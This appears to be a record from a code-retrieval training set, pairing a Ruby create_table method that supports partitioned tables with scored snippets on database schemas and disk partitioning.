"def schema(name, file=nil, &block)\n extend_schema(Schema.new(name), file, &block)\n end",
"def migration(version, fingerprint, name)\n SchemaMigration.create!(version: version, migrated_at: Time.now, fingerprint: fingerprint, name: name)\n end",
"def schema(schema_name)\n state_depth_must_be(States::DOMAIN)\n s = schema_lookup(schema_name)\n if s.nil?\n n = Schema.new(@current_domain, schema_name)\n @current_domain.schemas << n\n @current_schema = n\n else\n @current_schema = s\n end\n clear_state_below(States::SCHEMA)\n end",
"def user_defined_schemas(stream)\n return if (list = (@connection.user_defined_schemas - ['public'])).empty?\n\n stream.puts \" # Custom schemas defined in this database.\"\n list.each { |name| stream.puts \" create_schema \\\"#{name}\\\", force: :cascade\" }\n stream.puts\n end",
"def create_db(opts)\n\t\tbegin\n\t\t\tcase opts[\"adapter\"]\n\t\t\twhen 'sqlite3'\n\t\t\t\t# Sqlite just needs the file to be writable. ActiveRecord creates\n\t\t\t\t# it if it doesn't exist and checks permissions if it does. This\n\t\t\t\t# all happens during establish_connection(), so we don't need to\n\t\t\t\t# bother with creating anything here.\n\t\t\twhen 'postgresql','mysql'\n\t\t\t\tActiveRecord::Base.establish_connection(opts.merge('database' => nil))\n\t\t\t\tActiveRecord::Base.connection.create_database(opts['database'])\n\t\t\t\tActiveRecord::Base.remove_connection\n\t\t\tend\n\t\trescue ::Exception => e\n\t\t\tilog(\"Trying to continue despite failed database creation: #{e}\")\n\t\tend\n\tend",
"def delete\n ensure_service!\n service.delete_schema name\n true\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def create_table(name)\n if ! db.tables.include?(name.to_sym)\n db.create_table name do\n String :name, :size => 15\n Float :freq\n index :freq\n end\n end\n end",
"def initialize(name, opts = {})\n super\n initialize_schema_module(opts)\n end",
"def supports_create_table_if_not_exists?\n true\n end",
"def create_index(schema, opts = {})\n call(ft_create(schema, opts))\n end",
"def create_db_schema(connection)\n connection.execute 'CREATE TABLE documents (id INTEGER PRIMARY KEY AUTOINCREMENT, name)'\n connection.execute 'CREATE TABLE words (id, doc_id, value)'\n connection.execute 'CREATE TABLE characters (id, word_id, value)'\nend",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def drop_schema(schema_name)\n execute(\"DROP SCHEMA \\\"#{schema_name}\\\"\")\n end",
"def recreate_database(name)\n existing_database = current_database.to_s\n if name.to_s == existing_database\n do_execute 'USE master' \n end\n drop_database(name)\n create_database(name)\n ensure\n do_execute \"USE #{existing_database}\" if name.to_s == existing_database \n end",
"def schema_params\n params.require(:schema).permit(:name)\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def recreate_database(name, options = {})\n drop_database(name)\n sql = create_database(name, options)\n reconnect!\n sql\n end"
] |
[
"0.7882215",
"0.76678604",
"0.76181155",
"0.73712593",
"0.73512733",
"0.7165824",
"0.70954925",
"0.69713676",
"0.6500826",
"0.6297565",
"0.62504894",
"0.61846215",
"0.6069834",
"0.6034471",
"0.59912986",
"0.59591717",
"0.5923187",
"0.5832113",
"0.5630911",
"0.56262213",
"0.5587867",
"0.55720395",
"0.5551262",
"0.55249834",
"0.55112267",
"0.5502928",
"0.5403313",
"0.53866345",
"0.5371765",
"0.5361246",
"0.53264034",
"0.5317269",
"0.52865463",
"0.5253378",
"0.5253378",
"0.52513325",
"0.5245612",
"0.52435523",
"0.5231833",
"0.51460785",
"0.514555",
"0.51414484",
"0.51388615",
"0.5136635",
"0.5105243",
"0.5102611",
"0.51007867",
"0.50817937",
"0.50630337",
"0.50615627",
"0.50566685",
"0.5049342",
"0.5041024",
"0.502128",
"0.5012393",
"0.49800578",
"0.49620852",
"0.49372035",
"0.4930603",
"0.49232903",
"0.4895915",
"0.48699617",
"0.48601967",
"0.48437077",
"0.48408243",
"0.48137194",
"0.48124063",
"0.48048952",
"0.47904083",
"0.47904083",
"0.4776201",
"0.47760236",
"0.47629443",
"0.476234",
"0.47588584",
"0.47569877",
"0.4755187",
"0.4749755",
"0.47438842",
"0.47367674",
"0.4733751",
"0.4725232",
"0.47026175",
"0.4701033",
"0.46894988",
"0.46836555",
"0.4664511",
"0.4657183",
"0.46507302",
"0.46415",
"0.4632745",
"0.46227285",
"0.4607051",
"0.46066624",
"0.46032542",
"0.4586925",
"0.4584271",
"0.4578395",
"0.45770708",
"0.4576083"
] |
0.76356405
|
2
|
Support partitions of tables using the :partition_of option.
|
def create_table(name, options=OPTS, &block)
if options[:partition_of]
create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)
return
end
super
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def partition_list()\nend",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def make_partition_list(withall, flavor)\n part_list = []\n Builtins.foreach(RootPart.rootPartitions) do |partition, i|\n # see https://bugzilla.novell.com/attachment.cgi?id=96783&action=view\n\n # see bugzilla #288201\n # architecture needs to be valid when updating, not booting\n arch_is_valid = flavor == :boot ?\n true :\n Ops.get_boolean(i, :arch_valid, false)\n if withall || Ops.get_boolean(i, :valid, false) && arch_is_valid\n # `ext2, `jfs, ...\n part_fs = Ops.get_symbol(i, :fs)\n part_fs_name = Builtins.tostring(part_fs)\n if part_fs_name != nil &&\n Builtins.regexpmatch(part_fs_name, \"^`(.*)$\")\n part_fs_name = Builtins.regexpsub(part_fs_name, \"^`(.*)$\", \"\\\\1\")\n end\n\n system = Ops.get_string(i, :name, \"error\")\n # unknown system\n if system == \"unknown\"\n if part_fs != nil\n if CanBeLinuxRootFS(part_fs)\n # Table item (unknown system)\n system = _(\"Unknown Linux\")\n else\n # Table item (unknown system)\n system = _(\"Unknown or Non-Linux\")\n end\n else\n # Table item (unknown system [neither openSUSE 11.1 nor SLES 14 nor ...])\n system = _(\"Unknown\") if system == \"unknown\"\n end\n end\n\n arch = Ops.get_string(i, :arch, \"error\")\n # Table item (unknown architecture)\n arch = _(\"Unknown\") if arch == \"unknown\"\n\n # fist, use the name of file system (with short name for Linux)\n # then the file system short name\n # then \"Unknown\"\n fs = \"\"\n\n # is a linux fs, can be a root fs, has a fs name\n if part_fs != nil && Ops.get(i, :fstype) != nil &&\n CanBeLinuxRootFS(part_fs) &&\n part_fs_name != nil\n fs = Builtins.sformat(\n _(\"%1 (%2)\"),\n Ops.get_string(i, :fstype, \"\"),\n part_fs_name\n )\n else\n fs = Ops.get_string(i, :fstype, Ops.get_string(i, :fs, \"\"))\n end\n # Table item (unknown file system)\n fs = _(\"Unknown\") if fs == \"\"\n\n label = Ops.get_string(i, :label, \"\")\n\n part_list = Builtins.add(\n part_list,\n Item(Id(partition), system, partition, arch, fs, label)\n )\n end\n end\n deep_copy(part_list)\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def partitions\n topics.values.flat_map(&:partitions)\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
"def list_partitions_with_size_and_type # by nelsongs. => list: partition size type\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\") print $1\":\"$5\":\"$6;else print $1\":\"$4\":\"$5}' | sed s/+//g`.split\nend",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? \"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def partitioned_state\n super\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def query_partitions(partition_filter, statement, options = nil)\n policy = create_policy(options, QueryPolicy, default_query_policy)\n new_policy = policy.clone\n\n nodes = @cluster.nodes\n if nodes.empty?\n raise Aerospike::Exceptions::Aerospike.new(Aerospike::ResultCode::SERVER_NOT_AVAILABLE, \"Query failed because cluster is empty.\")\n end\n\n # result recordset\n recordset = Recordset.new(policy.record_queue_size, 1, :query)\n tracker = PartitionTracker.new(policy, nodes, partition_filter)\n Thread.new do\n Thread.current.abort_on_exception = true\n QueryExecutor.query_partitions(@cluster, policy, tracker, statement, recordset)\n end\n\n recordset\n end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def parent_table_schema_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_schema_name)\n end",
"def parent_table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:parent_table_name)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def hadoop_partition_args\n if options[:partition_fields]\n [\n '-partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner',\n jobconf(:output_field_separator),\n jobconf(:partition_fields),\n ]\n end\n end",
"def partitions(key, partitions)\n master = fnv_hash(key) % partitions.size\n selected = [master]\n nodes = [partitions[master]]\n current = (master + 1) % partitions.size\n\n # Walk clockwise around the ring of partitions, starting from the master partition.\n # The next few unique nodes in ring order are the replicas.\n while current != master && selected.size < @replicas\n if !nodes.include? partitions[current]\n nodes << partitions[current]\n selected << current\n end\n current = (current + 1) % partitions.size\n end\n\n selected\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def partition(arr, n)\n\nend",
"def isPartition(partition)\n partition = deep_copy(partition)\n AutoinstCommon.isValidObject(@fields, partition)\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def split_partitions\n partition_names = @list.map { |bin| bin.partition_names }.flatten\n partition_names.select { |name| partition_names.index(name) != partition_names.rindex(name) }.uniq\n end",
"def GetPartitionLst(tg, device)\n tg = deep_copy(tg)\n ret = []\n tmp = GetDiskPartitionTg(device, tg)\n Builtins.y2milestone(\"GetPartitionLst tmp:%1\", tmp)\n Builtins.foreach(tmp) do |m|\n disk = Ops.get_string(m, \"disk\", \"\")\n if Builtins.search(device, \"/dev/evms\") == 0 &&\n !Builtins.haskey(tg, disk)\n disk = \"/dev/evms\"\n end\n Builtins.y2debug(\"GetPartitionLst device=%1 disk=%2\", device, disk)\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"device\", \"\") == device\n end\n part = Builtins.filter(part) { |p| !Ops.get_boolean(p, \"delete\", false) }\n if Builtins.size(part) == 0 && Ops.is_integer?(Ops.get(m, \"nr\", 0))\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_integer(p, \"nr\", -1) == Ops.get_integer(m, \"nr\", 0)\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n if Builtins.size(part) == 0\n part = Builtins.filter(Ops.get_list(tg, [disk, \"partitions\"], [])) do |p|\n Ops.get_string(p, \"name\", \"\") == Ops.get_string(m, \"nr\", \"\")\n end\n part = Builtins.filter(part) do |p|\n !Ops.get_boolean(p, \"delete\", false)\n end\n end\n pa = Ops.get(part, 0, {})\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/mapper\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n if Builtins.size(pa) == 0 &&\n Builtins.search(device, \"/dev/mapper/\") == 0\n part = Builtins.filter(\n Ops.get_list(tg, [\"/dev/loop\", \"partitions\"], [])\n ) { |p| Ops.get_string(p, \"device\", \"\") == device }\n pa = Ops.get(part, 0, {})\n end\n ret = Builtins.add(ret, pa) if Ops.greater_than(Builtins.size(pa), 0)\n end\n Builtins.y2debug(\"GetPartitionLst ret=%1\", ret)\n deep_copy(ret)\n end",
